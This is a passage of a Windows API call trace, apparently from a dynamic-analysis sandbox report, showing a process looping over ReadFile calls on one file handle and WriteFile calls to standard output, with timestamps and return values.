_get_osfhandle (_FileHandle=1) returned 0x50 [0232.999] GetFileType (hFile=0x50) returned 0x1 [0232.999] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.999] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0232.999] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.999] GetFileType (hFile=0x50) returned 0x1 [0232.999] _get_osfhandle (_FileHandle=1) returned 0x50 [0232.999] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.000] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.000] GetFileType (hFile=0x50) returned 0x1 [0233.000] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.000] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.000] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.000] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.000] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.000] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.000] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.000] GetFileType (hFile=0x50) returned 0x1 [0233.000] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.000] GetFileType (hFile=0x50) returned 0x1 [0233.000] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.000] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.000] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.000] GetFileType (hFile=0x50) returned 0x1 [0233.000] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.000] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.000] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.000] GetFileType (hFile=0x50) returned 0x1 [0233.000] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.000] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.001] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.001] GetFileType (hFile=0x50) returned 0x1 [0233.001] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.001] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.001] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.001] GetFileType (hFile=0x50) returned 0x1 [0233.001] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.001] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.001] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.001] GetFileType (hFile=0x50) returned 0x1 [0233.001] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.001] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.001] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.001] GetFileType (hFile=0x50) returned 0x1 [0233.001] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.001] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.001] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.001] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.001] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.001] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.001] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.001] GetFileType (hFile=0x50) returned 0x1 [0233.001] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.001] GetFileType (hFile=0x50) returned 0x1 [0233.002] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.002] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.002] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.002] GetFileType (hFile=0x50) returned 0x1 [0233.002] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.002] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.002] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.002] GetFileType (hFile=0x50) returned 0x1 [0233.002] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.002] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.002] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.002] GetFileType (hFile=0x50) returned 0x1 [0233.002] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.002] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.002] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.002] GetFileType (hFile=0x50) returned 0x1 [0233.002] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.002] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.002] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.002] GetFileType (hFile=0x50) returned 0x1 [0233.002] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.002] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.002] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.003] GetFileType (hFile=0x50) returned 0x1 [0233.003] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.003] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.003] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.003] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.003] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.003] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.003] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.003] GetFileType (hFile=0x50) returned 0x1 [0233.003] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.003] GetFileType (hFile=0x50) returned 0x1 [0233.003] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.003] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.003] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.003] GetFileType (hFile=0x50) returned 0x1 [0233.003] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.003] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.003] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.003] GetFileType (hFile=0x50) returned 0x1 [0233.003] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.003] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.003] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.003] GetFileType (hFile=0x50) returned 0x1 [0233.003] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.003] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.004] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.004] GetFileType (hFile=0x50) returned 0x1 [0233.004] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.004] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.004] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.004] GetFileType (hFile=0x50) returned 0x1 [0233.004] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.004] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.004] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.004] GetFileType (hFile=0x50) returned 0x1 [0233.004] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.004] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.004] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.004] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.004] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.004] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.004] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.004] GetFileType (hFile=0x50) returned 0x1 [0233.004] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.004] GetFileType (hFile=0x50) returned 0x1 [0233.004] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.004] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.004] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.004] GetFileType (hFile=0x50) returned 0x1 [0233.004] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.004] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.005] GetFileType (hFile=0x50) returned 0x1 [0233.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.005] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.005] GetFileType (hFile=0x50) returned 0x1 [0233.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.005] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.005] GetFileType (hFile=0x50) returned 0x1 [0233.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.005] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.005] GetFileType (hFile=0x50) returned 0x1 [0233.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.005] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.005] GetFileType (hFile=0x50) returned 0x1 [0233.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.005] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.005] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.005] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.006] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.006] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.006] GetFileType (hFile=0x50) returned 0x1 [0233.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.006] GetFileType (hFile=0x50) returned 0x1 [0233.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.006] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.006] GetFileType (hFile=0x50) returned 0x1 [0233.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.006] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.006] GetFileType (hFile=0x50) returned 0x1 [0233.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.006] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.006] GetFileType (hFile=0x50) returned 0x1 [0233.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.006] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.006] GetFileType (hFile=0x50) returned 0x1 [0233.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.006] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.006] GetFileType (hFile=0x50) returned 0x1 [0233.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.007] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.007] GetFileType (hFile=0x50) returned 0x1 [0233.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.007] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.007] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.007] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.007] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.007] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.007] GetFileType (hFile=0x50) returned 0x1 [0233.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.007] GetFileType (hFile=0x50) returned 0x1 [0233.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.007] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.007] GetFileType (hFile=0x50) returned 0x1 [0233.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.007] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.007] GetFileType (hFile=0x50) returned 0x1 [0233.007] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.007] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.008] GetFileType (hFile=0x50) returned 0x1 [0233.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.008] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.008] GetFileType (hFile=0x50) returned 0x1 [0233.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.008] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.008] GetFileType (hFile=0x50) returned 0x1 [0233.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.008] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.008] GetFileType (hFile=0x50) returned 0x1 [0233.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.008] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.008] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.008] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.008] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.008] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.008] GetFileType (hFile=0x50) returned 0x1 [0233.008] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.009] GetFileType (hFile=0x50) returned 0x1 [0233.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.009] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.009] GetFileType (hFile=0x50) returned 0x1 [0233.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.009] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.009] GetFileType (hFile=0x50) returned 0x1 [0233.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.009] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.009] GetFileType (hFile=0x50) returned 0x1 [0233.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.009] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.009] GetFileType (hFile=0x50) returned 0x1 [0233.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.009] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.009] GetFileType (hFile=0x50) returned 0x1 [0233.009] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.009] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, 